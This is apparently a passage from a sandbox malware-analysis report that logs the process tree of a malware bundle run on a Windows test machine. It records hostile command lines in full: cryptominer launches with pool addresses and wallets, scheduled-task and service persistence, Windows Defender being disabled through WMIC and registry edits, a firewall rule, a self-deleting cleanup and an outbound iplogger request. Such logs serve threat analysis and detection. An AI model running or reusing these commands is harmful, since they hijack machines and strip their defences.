  "C:\Users\Admin\Documents\cEio288hwuKoR76YXemh7cs9.exe"
  2⤵
  PID:7176
- C:\Users\Admin\Documents\6aqfnD85IXhFXDTaJfYx6ADb.exe
  "C:\Users\Admin\Documents\6aqfnD85IXhFXDTaJfYx6ADb.exe"
  2⤵
  PID:5412
- C:\Users\Admin\Documents\JjAMlZxoaHYQbALFGb1z8SOp.exe
  "C:\Users\Admin\Documents\JjAMlZxoaHYQbALFGb1z8SOp.exe"
  2⤵
  PID:6728
- - C:\Users\Admin\Documents\JjAMlZxoaHYQbALFGb1z8SOp.exe
    C:\Users\Admin\Documents\JjAMlZxoaHYQbALFGb1z8SOp.exe
    3⤵
    PID:7764

C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu1189012621353ba47.exe
Thu1189012621353ba47.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:3224
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /im Thu1189012621353ba47.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu1189012621353ba47.exe" & del C:\ProgramData\*.dll & exit
  2⤵
  PID:6812
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im Thu1189012621353ba47.exe /f
    3⤵
    - Kills process with taskkill
    PID:6260
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 6
    3⤵
    - Delays execution with timeout.exe
    PID:6648

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
1⤵
- Executes dropped EXE
PID:4712
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
  2⤵
  PID:5036
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
    3⤵
    - Creates scheduled task(s)
    PID:3160
- C:\Users\Admin\AppData\Roaming\services64.exe
  "C:\Users\Admin\AppData\Roaming\services64.exe"
  2⤵
  PID:7020
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
    3⤵
    PID:8304
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
      4⤵
      Creates scheduled task(s)
      PID:3932
- - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
    3⤵
    PID:8680
- - C:\Windows\explorer.exe
    C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
    3⤵
    PID:9916

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:416
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:1120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:6252

C:\Windows\SysWOW64\cmd.exe
"cmd" /c start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1ZpGf7"
1⤵
PID:7360
- C:\Users\Admin\AppData\Local\Temp\wwi.exe
  "wwi.exe"
  2⤵
  PID:7736
- C:\Users\Admin\AppData\Local\Temp\wwl.exe
  "wwl.exe"
  2⤵
  PID:7772
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1ZpGf7"
  2⤵
  PID:7836

C:\Users\Admin\AppData\Local\Temp\92BB.exe
C:\Users\Admin\AppData\Local\Temp\92BB.exe
1⤵
PID:8668

C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5140

C:\Users\Admin\AppData\Local\Temp\E8DB.exe
C:\Users\Admin\AppData\Local\Temp\E8DB.exe
1⤵
PID:6680
- C:\Users\Admin\AppData\Local\Temp\E8DB.exe
  C:\Users\Admin\AppData\Local\Temp\E8DB.exe
  2⤵
  PID:8904
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Users\Admin\AppData\Local\7ce92fdf-9ee4-482c-af58-c40d5ed097ce" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    3⤵
    - Modifies file permissions
    PID:9480
- - C:\Users\Admin\AppData\Local\Temp\E8DB.exe
    "C:\Users\Admin\AppData\Local\Temp\E8DB.exe" --Admin IsNotAutoStart IsNotTask
    3⤵
    PID:11164
  - - C:\Users\Admin\AppData\Local\Temp\E8DB.exe
      "C:\Users\Admin\AppData\Local\Temp\E8DB.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      PID:11064
    - - C:\Users\Admin\AppData\Local\bd162f6d-2ba0-49ff-90a5-9864779bfe15\build2.exe
        
        "C:\Users\Admin\AppData\Local\bd162f6d-2ba0-49ff-90a5-9864779bfe15\build2.exe"
        5⤵
        
        PID:8944
      - C:\Users\Admin\AppData\Local\bd162f6d-2ba0-49ff-90a5-9864779bfe15\build2.exe
        
        "C:\Users\Admin\AppData\Local\bd162f6d-2ba0-49ff-90a5-9864779bfe15\build2.exe"
        6⤵
        
        PID:10596
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\bd162f6d-2ba0-49ff-90a5-9864779bfe15\build2.exe" & del C:\ProgramData\*.dll & exit
        7⤵
        
        PID:2536
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im build2.exe /f
        8⤵
        Kills process with taskkill
        
        PID:9492
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        8⤵
        Delays execution with timeout.exe
        
        PID:8884
    - - C:\Users\Admin\AppData\Local\bd162f6d-2ba0-49ff-90a5-9864779bfe15\build3.exe
        
        "C:\Users\Admin\AppData\Local\bd162f6d-2ba0-49ff-90a5-9864779bfe15\build3.exe"
        5⤵
        
        PID:7908
      - C:\Users\Admin\AppData\Local\bd162f6d-2ba0-49ff-90a5-9864779bfe15\build3.exe
        
        "C:\Users\Admin\AppData\Local\bd162f6d-2ba0-49ff-90a5-9864779bfe15\build3.exe"
        6⤵
        
        PID:10928
        
        C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
        7⤵
        Creates scheduled task(s)
        
        PID:10140

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:9144
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:7192

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:6764
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 9D3EA2CD68432FF2C522DB206FB7122D C
  2⤵
  PID:10400
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding BB10790F86DAC79EFA0C5A8234E65084
  2⤵
  PID:10168
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:9144
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding B48406958786E78C828F716E04A49139 E Global\MSI0000
  2⤵
  PID:812

C:\Users\Admin\AppData\Local\Temp\E9B2.exe
C:\Users\Admin\AppData\Local\Temp\E9B2.exe
1⤵
PID:1108
- C:\Users\Admin\AppData\Local\Temp\E9B2.exe
  C:\Users\Admin\AppData\Local\Temp\E9B2.exe
  2⤵
  PID:2264

C:\Users\Admin\AppData\Local\Temp\47F.exe
C:\Users\Admin\AppData\Local\Temp\47F.exe
1⤵
PID:10704
- C:\Users\Admin\AppData\Local\Temp\47F.exe
  C:\Users\Admin\AppData\Local\Temp\47F.exe
  2⤵
  PID:9624

C:\Users\Admin\AppData\Local\Temp\2239.exe
C:\Users\Admin\AppData\Local\Temp\2239.exe
1⤵
PID:10656

C:\Users\Admin\AppData\Local\Temp\435E.exe
C:\Users\Admin\AppData\Local\Temp\435E.exe
1⤵
PID:8656

C:\Users\Admin\AppData\Local\Temp\7E46.exe
C:\Users\Admin\AppData\Local\Temp\7E46.exe
1⤵
PID:6516

C:\Users\Admin\AppData\Local\Temp\28BF.exe
C:\Users\Admin\AppData\Local\Temp\28BF.exe
1⤵
PID:10832
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ovmbnopi\
  2⤵
  PID:8312
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\rhcoiuyq.exe" C:\Windows\SysWOW64\ovmbnopi\
  2⤵
  PID:9760
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" create ovmbnopi binPath= "C:\Windows\SysWOW64\ovmbnopi\rhcoiuyq.exe /d\"C:\Users\Admin\AppData\Local\Temp\28BF.exe\"" type= own start= auto DisplayName= "wifi support"
  2⤵
  PID:9720
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" description ovmbnopi "wifi internet conection"
  2⤵
  PID:10340
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" start ovmbnopi
  2⤵
  PID:10076
- C:\Windows\SysWOW64\netsh.exe
  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
  2⤵
  PID:5772

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:10448
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:10728

C:\Users\Admin\AppData\Roaming\facjjbr
C:\Users\Admin\AppData\Roaming\facjjbr
1⤵
PID:9104
- C:\Users\Admin\AppData\Roaming\facjjbr
  C:\Users\Admin\AppData\Roaming\facjjbr
  2⤵
  PID:6412

C:\Users\Admin\AppData\Roaming\cfcjjbr
C:\Users\Admin\AppData\Roaming\cfcjjbr
1⤵
PID:10024

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:1888
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:10900

C:\Users\Admin\AppData\Local\Temp\4F34.exe
C:\Users\Admin\AppData\Local\Temp\4F34.exe
1⤵
PID:8372
- C:\Users\Admin\AppData\Local\Temp\4F34.exe
  "C:\Users\Admin\AppData\Local\Temp\4F34.exe"
  2⤵
  PID:5900

C:\Windows\SysWOW64\ovmbnopi\rhcoiuyq.exe
C:\Windows\SysWOW64\ovmbnopi\rhcoiuyq.exe /d"C:\Users\Admin\AppData\Local\Temp\28BF.exe"
1⤵
PID:5568
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  PID:11176
- - C:\Windows\SysWOW64\svchost.exe
    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
    3⤵
    PID:8900

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
PID:9764

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:8236
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:8144

C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\wwgpFMiovwBgRpD\DfSKBUo.exe
C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\wwgpFMiovwBgRpD\DfSKBUo.exe XY /site_id 668658 /S
1⤵
PID:9736
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
  2⤵
  PID:8528
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
    3⤵
    PID:11080
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
      4⤵
      PID:5692
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:7024
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        
        PID:2900
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
    3⤵
    PID:5772
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
      4⤵
      PID:5268
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:8432
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        
        PID:6676
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
    3⤵
    PID:10212
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
      4⤵
      PID:9700
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:7256
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        
        PID:7816
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
    3⤵
    PID:7484
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
      4⤵
      PID:3376
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:5140
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        
        PID:7092
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:9248
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1376
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:9648
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8712
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:11184
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8092
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6656
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1860
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:9956
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5132
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4260
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    - Executes dropped EXE
    PID:5768
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:9376
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:10268
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8884
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2928
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4872
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:9684
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8296
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6168
- - C:\Windows\SysWOW64\reg.exe
